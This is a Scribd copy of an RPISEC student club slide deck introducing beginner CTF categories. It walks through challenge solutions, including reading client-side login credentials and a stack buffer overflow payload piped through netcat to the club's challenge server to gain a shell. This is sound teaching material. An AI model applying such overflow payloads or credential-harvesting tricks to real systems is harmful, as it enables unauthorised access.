Scribd
Upload
56 views62 pages

02 - Fairgame Rundown

This document provides an overview of the Fairgame capture the flag (CTF) competition run by RPISEC. Fairgame covers five subjects: pwn (binary exploitation), re (reverse engineering), crypto (cryptography), web (web applications), and misc (puzzles, steganography, etc.). It describes some introductory challenges for each subject area, including tools needed and solutions. The challenges increase in difficulty and cover various techniques like identifying cipher types, debugging binaries, finding hidden files, and exploiting vulnerabilities. The document aims to introduce participants to the range of skills tested in CTF competitions.

Uploaded by

carkloun
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
56 views62 pages

02 - Fairgame Rundown

This document provides an overview of the Fairgame capture the flag (CTF) competition run by RPISEC. Fairgame covers five subjects: pwn (binary exploitation), re (reverse engineering), crypto (cryptography), web (web applications), and misc (puzzles, steganography, etc.). It describes some introductory challenges for each subject area, including tools needed and solutions. The challenges increase in difficulty and cover various techniques like identifying cipher types, debugging binaries, finding hidden files, and exploiting vulnerabilities. The document aims to introduce participants to the range of skills tested in CTF competitions.

Uploaded by

carkloun
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 62

RPISEC

Fairgame Rundown
Fall 2022

RPISEC - 09/30/2022 RPISEC 1


Fairgame
• Fairgame is an introductory CTF
• Runs until winter break
• Covers five subjects:
– pwn - binary exploitation
– re - reverse engineering
– crypto - cryptography
– web - web applications
– misc - puzzles, steganography, party tricks, etc.

RPISEC - 09/30/2022 RPISEC 2


Tooling
• VM installation was covered at INTROSEC
• Includes a variety of useful tools
• Get it here: http://tools.rpis.ec/
• We’ll also assume you have some basic experience with the
Linux command line
– All important commands are shown, though!

RPISEC - 09/30/2022 RPISEC 3


Conventions
$ commands are shown like this

RPISEC - 09/30/2022 RPISEC 4


misc
• misc chals cover a variety of topics
• Finding the right angle is key

RPISEC - 09/30/2022 RPISEC 5


misc100?
- Our misc100 is somewhere on Slack this year (:
- ...so we'll look at misc200 instead
- (it's definitely not just the normal misc100)

RPISEC - 09/30/2022 RPISEC 6


misc200 - “Flag? What Flag?”
• Download misc100.tar.gz
• This is a gzipped tarball
– gzip compresses files
– tar puts files into a single archive - a “tarball”
• Basically the .zip of Linux

RPISEC - 09/30/2022 RPISEC 7


misc200 - “Flag? What flag?”
• We’re told it’s an ext2 disk image
• ext2 is a predecessor of ext4
• We can mount the image to browse its contents like a flash
drive

RPISEC - 09/30/2022 RPISEC 8


misc200 - “Flag? What Flag?”
• Extract it with:
tar -xf misc100.tar.gz
• -x to extract
• -f to specify the file

RPISEC - 09/30/2022 RPISEC 9


misc200 - “Flag? What Flag?”

RPISEC - 09/30/2022 RPISEC 10


misc200 - “Flag? What flag?”
• One file comes out, misc100.img
• .img files are usually disk images
– Basically a snapshot of a storage device
• We can find out what kind of image it is with:
file misc100.img
• The file command tries to identify a file

RPISEC - 09/30/2022 RPISEC 11


misc200 - “Flag? What flag?”
• First, make a directory to mount to:
mkdir mnt

RPISEC - 09/30/2022 RPISEC 12


misc200 - “Flag? What flag?”
• Then, mount the image:
sudo mount -o loop misc100.img mnt
• mount requires root powers, hence the sudo
• Root password on the Tools VM is rpisec
• Now you can browse the files within:
cd mnt

RPISEC - 09/30/2022 RPISEC 13


misc200 - “Flag? What flag?”
• Let’s look around a bit
ls
• You’ll see the following files:
bin dev etc lib linuxrc lost+found proc sbin tmp usr var
• So this is a disk image of some Linux system

RPISEC - 09/30/2022 RPISEC 14


misc200 - “Flag? What flag?”
• ...but where’s the flag?
• Let’s take a closer look!
ls -la
• -l to show files in a list
• -a to show all files

RPISEC - 09/30/2022 RPISEC 15


misc200 - “Flag? What flag?”
• There’s a file called .flag in there!
– Files with a . in front are hidden by default
• So, what is it?
file .flag
• It’s gzip compressed data
• We can extract it with...gzip, of course
• The mounted image is read-only, though, so we’ll move the
file first.
RPISEC - 09/30/2022 RPISEC 16
misc200 - “Flag? What flag?”
cp .flag /tmp/flag.gz
cd /tmp
gunzip flag.gz
• Now we have a file called flag
file flag
• It’s a .tar again!
tar -xf flag
RPISEC - 09/30/2022 RPISEC 17
misc200 - “Flag? What flag?”
• The .tar contained a file called flag, so it overwrote itself
• Now we can just…
cat flag

RPISEC - 09/30/2022 RPISEC 18


misc200 - “Flag? What flag?”
• This sort of challenge becomes very easy once you’re used to
the terminal
• Always try to figure out what is you’re looking at!
– file
– binwalk

RPISEC - 09/30/2022 RPISEC 19


web
• web challenges deal with...web stuff
– Pretty much anything with a browser
• Split into two big categories:
– Client-side: attacking the browser
– Server-side: attacking the server

RPISEC - 09/30/2022 RPISEC 20


web100 - “Client Page”
• web100 presents us with a login screen
• First, we should examine the page!
• In Firefox, hit ctrl+u to view the page’s source

RPISEC - 09/30/2022 RPISEC 21


web100 - “Client Page”
• auth.js sounds interesting!
• Click on it to view the file

RPISEC - 09/30/2022 RPISEC 22


web100 - “Client Page”
• Oh no! Client-side authentication!
– The login is checked in your browser…
– ...and not on the server
• users sounds pretty interesting...

RPISEC - 09/30/2022 RPISEC 23


web100 - “Client Page”
• Open the dev console with F12 or ctrl-shift-I
• Now we can look at users by typing…
users
• It’s an array of two things, so view the first one:
users[0]
• Looks like a username and password to me!
• Log in and get the flag
RPISEC - 09/30/2022 RPISEC 24
web100 - “Client Page”
• That was easy.
• The rest are harder!
• Web challenges cover a lot of territory:
– SQL injection to abuse badly written database queries
– XSS (cross-site-scripting) to make other users run code
– Uploading malicious files and viewing those we shouldn’t

RPISEC - 09/30/2022 RPISEC 25


crypto
• crypto challenges fall into two camps:
– Classic ciphers, which are extremely weak
∘ Caesar ciphers
∘ Vigenere ciphers
– Modern ciphers, but with a deliberate mistake
∘ RSA
∘ DES

RPISEC - 09/30/2022 RPISEC 26


crypto100 - “Classic”
• This one is a classical cipher
– The title is a pretty big hint
– The cipher clearly didn’t hide the flag

vbqw{0bt1u_rkj_d0j_i0_we0t1u}
• So, we just need to identify the cipher

RPISEC - 09/30/2022 RPISEC 27


crypto100 - “Classic”
• Tools exist online for all of these
• Two of my suggestions:
– https://gchq.github.io/CyberChef/
– https://cryptii.com/

RPISEC - 09/30/2022 RPISEC 28


crypto100 - “Classic”
• It was a Caesar cipher.
– A=K
– Shift of 10

RPISEC - 09/30/2022 RPISEC 29


crypto100 - “Classic”
• Classical ciphers can be broken easily:
– Guessing all the keys (Caesar)
– Exploiting language patterns (Vigenere)
∘ E shows up way more than Z
• Attacking modern ciphers like this does not work:
– Huge keys, expensive operations
– The universe dies before you find the flag
• Crypto challenges will always have a trick
– Implementation errors, bad parameters, etc.

RPISEC - 09/30/2022 RPISEC 30


re and pwn
• re and pwn are two sides of the same coin
– re: figure out how a system works
– pwn: figure out how a system breaks

RPISEC - 09/30/2022 RPISEC 31


re100 - “Milk Run”
• Reversing is an incredibly deep subject
– static analysis!
– dynamic analysis!
– decompilation!
• Fortunately, re100 is pretty simple
– The program has a secret.
– We want the secret.
– Hey, isn’t this basically web100?

RPISEC - 09/30/2022 RPISEC 32


re100 - “Milk Run”
• First, try running the program
./re100
• We type some gibberish, it says no

RPISEC - 09/30/2022 RPISEC 33


re100 - “Milk Run”
• A great place to start is strings
• Shows readable text in a file
strings re100
• That’s a lot of text...

RPISEC - 09/30/2022 RPISEC 34


re100 - “Milk Run”
• We don’t want to read all of that
• We can use grep to filter it down
– grep takes a string to look for

strings re100 | grep flag


• The | is a pipe
– strings writes some stuff
– grep reads that stuff
• And there’s the flag!
RPISEC - 09/30/2022 RPISEC 35
re100 - “Milk Run”
• re is a huge puzzle
• There are many powerful tools out there:
– IDA/Ghidra/Binary Ninja/r2 for pulling apart a program
– strings and hexdump to peek at data
– objdump to find function names
– gdb to see what happens at runtime

RPISEC - 09/30/2022 RPISEC 36


pwn100 - “Rewards Program”
• pwn is what our motto is all about:
– Break it
– Hack it
– Own it

RPISEC - 09/30/2022 RPISEC 37


pwn100 - “Rewards Program”
• First, run the program
chmod +x rewards-program
./rewards-program
• It asks for your name. Type something short.

RPISEC - 09/30/2022 RPISEC 38


pwn100 - “Rewards Program”
• Darn :(

RPISEC - 09/30/2022 RPISEC 39


pwn100 - “Rewards Program”
• What if we had a longer name?
• Let’s say our name is…
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

RPISEC - 09/30/2022 RPISEC 40


pwn100 - “Rewards Program”
• That’s...interesting

RPISEC - 09/30/2022 RPISEC 41


pwn100 - “Rewards Program”
• Our input made some weird stuff happen:
– It messed up the point counter
∘ 1094795585 is not 0
– It crashed the whole program!
∘ Segfault!
• (we accessed invalid memory)

• We just broke it

RPISEC - 09/30/2022 RPISEC 42


pwn100 - "Rewards Program"
• The program stores our name next to the point counter
int points = 0;
char foo[20];

• But it only has room for 20 characters


• Our name was 32 characters long

RPISEC - 09/30/2022 RPISEC 43


pwn100 - “Rewards Program”
• This is a buffer overflow
– The program didn’t have room for our name
• 20 bytes of A's fit correctly
• The next 4 bytes clobbered the point counter
• The rest screwed up C's bookkeeping

RPISEC - 09/30/2022 RPISEC 44


pwn100 - “Rewards Program”
• So, how exactly did we get 1094795585 points?
• Let’s look at that number in a different way:
– Decimal: 1094795585
– Hex: 0x41414141
• That looks familiar.
• What was A in ASCII, again?

RPISEC - 09/30/2022 RPISEC 45


pwn100 - “Rewards Program”
• 0x41 = ‘A’
• 0x41414141 = ‘AAAA’
• So, what if we want 322424845 points?

RPISEC - 09/30/2022 RPISEC 46


pwn100 - “Rewards Program”
• Just go from decimal to hex:
– Decimal: 322424845
– Hexadecimal: 0x1337D00D
• very leet, d00d
• That’s hard to type!
– 0x13 is “device control 3”
– 0x0D is a carriage return
– 0xD0 is a Unicode Ð

RPISEC - 09/30/2022 RPISEC 47


pwn100 - “Rewards Program”
• python is great for this.
– Specifically, python 2, because it's nicer for binary data
– This prints out AAAAAAAAAAAAAAAA - sixteen A’s

python2 -c "print 'A'*16"


• We can pipe that into the program like this:
python2 -c "print 'A'*16" | pwn100

RPISEC - 09/30/2022 RPISEC 48


pwn100 - “Rewards Program”
• Experiment with this until you just barely corrupt the counter

RPISEC - 09/30/2022 RPISEC 49


pwn100 - “Rewards Program”
• We needed 21 A’s to change our points to 65
– Decimal: 65
– Hexadecimal: 0x41
• So, let’s send 20 A’s, then 1337D00D!
python2 -c "print 'A'*20 + '\x13\x37\xd0\x0d'" | pwn100

RPISEC - 09/30/2022 RPISEC 50


pwn100 - “Rewards Program”
• Hang on, that gave us 231749395 points
– Decimal: 231749395
– Hexadecimal: 0x0dd03713
• It’s...backwards?

RPISEC - 09/30/2022 RPISEC 51


pwn100 - “Rewards Program”
• The program’s variables are stored on the stack.
• The stack grows downward, from the largest address.
• In pwn100, it looks something like this:
– reward points (4 bytes)
– name (20 bytes)
• name is before reward points in memory

RPISEC - 09/30/2022 RPISEC 52


pwn100 - “Rewards Program”
• If we make our name too long, it messes up the points
counter.
• This goes from low to high memory
• The first byte is the least significant byte
– 21 A’s gave us 65 points, remember?

RPISEC - 09/30/2022 RPISEC 53


pwn100 - “Rewards Program”
• 20 A’s + \x0d:
– 0x0000000D
• 20 A’s + \x0d\d0:
– 0x0000D00D
• 20 A’s +\x0d\xd0\x37:
– 0x0037D00D
• 20 A’s + \0d\xd0\x37\x13:
– 0x1337D00D

RPISEC - 09/30/2022 RPISEC 54


pwn100 - “Rewards Program”
• So, by putting the four bytes in reverse order...
python2 -c "print 'A'*20 + '\x0d\xd0\x37\x13'" |
nc chals.fairgame.rpis.ec 5001

• ...we have the right number of points!

RPISEC - 09/30/2022 RPISEC 55


pwn100 - “Rewards Program”
• Now we just need to do it remotely.
• Most pwn challenges work like this
– Can’t just give you the program with the flag!
– Remember re100?
• We’ll use netcat, or nc for short
nc chals.fairgame.rpis.ec 5001
• Try talking to the program again

RPISEC - 09/30/2022 RPISEC 56


pwn100 - “Rewards Program”
• Last step: pipe Python’s output into nc!
python2 -c "print 'A'*20 + '\x0d\xd0\x37\x13'" |
nc chals.fairgame.rpis.ec 5001

• (all on one line)

RPISEC - 09/30/2022 RPISEC 57


pwn100 - “Rewards Program”
• It worked!
• ...wait, we can’t do anything
• The program executes a shell when you win
• We can’t type anything
– nc is getting its input from Python
– Python isn’t doing anything with keyboard input
• This sucks

RPISEC - 09/30/2022 RPISEC 58


pwn100 - “Rewards Program”
• Solution:
(python2 -c "print 'A'*20 + '\x0d\xd0\x37\x13'"; cat) |
nc chals.fairgame.rpis.ec 5001

• This executes python2, then cat


• cat will just repeat whatever we type
– ...which gets piped into netcat!

RPISEC - 09/30/2022 RPISEC 59


pwn100 - “Rewards Program”
• pwn is a staple of CTFs
• Creativity and patience are a must
• Too many techniques to count!

RPISEC - 09/30/2022 RPISEC 60


Review
We’ve covered the basics of five CTF categories:
• misc - the potpourri category
• web - browser and web server tricks
• crypto - uncovering ciphered data
• re - figuring out how a program works
• pwn - figuring out how to break a program

RPISEC - 09/30/2022 RPISEC 61


Coming Soon...
● Next week: web!
● Get involved with RPISEC @ https://rpis.ec/contact
○ Slack can be found on https://rpisec.slack.com
■ Come chat with RPISEC members and alumni!
○ Mailing list invite can be found on contact page

RPISEC - 09/30/2022 RPISEC 62

You might also like